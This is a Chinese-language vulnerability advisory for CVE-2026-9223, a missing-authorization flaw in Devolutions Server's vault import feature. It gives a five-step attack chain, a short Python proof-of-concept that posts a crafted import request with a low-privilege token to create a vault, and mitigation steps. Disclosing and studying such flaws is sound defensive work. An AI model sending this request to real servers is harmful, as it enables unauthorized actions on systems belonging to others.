IPBUF安全漏洞报告
English
CVE-2026-9223 CVSS 4.3 中危

CVE-2026-9223 Devolutions Server 授权缺失漏洞

披露日期: 2026-05-22

漏洞信息

漏洞编号
CVE-2026-9223
漏洞类型
授权缺失
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Devolutions Server

相关标签

授权缺失Devolutions Server越权访问CVE-2026-9223DEVO-2026-0013中危漏洞Vault导入

漏洞概述

CVE-2026-9223是Devolutions Server产品中的一个授权缺失漏洞。该漏洞存在于vault导入功能中,编号为DEVO-2026-0013。漏洞允许低权限认证用户通过构造恶意的导入请求,在未经适当授权的情况下创建新的vault。这一安全缺陷使得攻击者可以利用一个低权限账户执行超出其权限范围的操作,可能导致系统资源被滥用或数据隔离被破坏。由于该漏洞无需用户交互即可被利用,且可通过网络远程触发,因此具有较高的实际威胁性。

技术细节

该漏洞的根本原因在于Devolutions Server的vault导入功能缺少适当的权限验证机制。在正常的安全设计中,创建新vault应该需要管理员或高权限用户的授权验证。然而,由于该功能的授权检查存在缺陷,低权限用户可以通过构造特定的导入请求参数来绕过权限限制。具体攻击方式是攻击者构造一个包含新vault配置信息的恶意导入请求,该请求在处理时未正确验证发起用户的权限级别,从而允许低权限用户成功创建本不应具有权限创建的新vault。这种授权绕过可能导致敏感数据隔离机制失效,攻击者可能创建具有更高权限或不同访问控制的vault对象。

攻击链分析

STEP 1
步骤1
攻击者获取Devolutions Server的低权限用户账户
STEP 2
步骤2
攻击者构造恶意的vault导入请求,包含新vault的创建参数
STEP 3
步骤3
攻击者通过API发送构造的导入请求到/api/vault/import端点
STEP 4
步骤4
服务器处理请求时,由于缺少授权检查,直接创建了新的vault
STEP 5
步骤5
攻击者成功创建了超出其权限范围的新vault,可能用于后续数据窃取或权限提升

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # CVE-2026-9223 PoC - Devolutions Server Vault Import Authorization Bypass # Target: Devolutions Server <= 2026.1.16.0 target_url = "https://target-server/api/vault/import" # Authentication headers (low-privilege user credentials) headers = { "Content-Type": "application/json", "Authorization": "Bearer <low_privilege_token>" } # Malicious import request to create new vault without proper authorization payload = { "vaultName": "MaliciousVault", "vaultType": "standard", "importData": { "entries": [] }, "createNew": True } try: response = requests.post(target_url, headers=headers, json=payload, verify=False, timeout=10) if response.status_code == 200 or response.status_code == 201: print("[+] SUCCESS: New vault created via unauthorized import") print(f"[+] Response: {response.json()}") else: print(f"[-] FAILED: Status code {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] ERROR: {str(e)}")

影响范围

Devolutions Server <= 2026.1.16.0

防御指南

临时缓解措施
在官方修复版本发布之前,建议限制低权限用户的API访问权限,监控vault创建操作的审计日志,并对vault导入功能实施额外的访问控制策略。可以考虑暂时禁用非管理员用户的vault导入功能,直到应用官方安全更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表